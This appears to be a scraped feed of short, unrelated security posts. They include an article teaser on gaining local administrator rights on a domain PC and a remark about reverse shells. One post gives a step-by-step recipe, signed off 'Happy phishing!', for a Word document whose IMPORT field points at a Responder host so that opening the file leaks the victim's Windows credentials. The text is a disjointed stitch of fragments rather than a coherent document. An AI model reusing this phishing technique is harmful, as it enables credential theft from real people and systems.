The Goal In this article I’ll show you how to add a regular Windows Active Directory domain user account to the local Administrators group on a PC without having access to either the domain...
Funny, I thought storing plain text passwords was a violation of #GDPR
Ofcourse they did.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Couldn’t get in through SSH or a reverse shell, but when you have a web app installed that runs as root and lets you view/edit all files on the machine, might as well have.